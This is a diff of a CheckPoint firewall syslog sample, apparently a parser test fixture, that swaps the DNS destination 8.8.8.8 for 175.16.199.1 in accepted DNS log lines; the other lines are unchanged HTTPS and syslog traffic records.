 <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55348"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504928"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59795"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504929"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57847"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504929"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46923"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504928"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59795"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504929"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57847"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504929"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46923"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58910"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e2a1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34754"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58264"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52654"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44484"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34754"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58264"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52654"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44484"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58870"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"32812"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54337"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54337"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38126"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504931"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504931"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38269"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504931"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504931"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38269"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54548"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52036"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
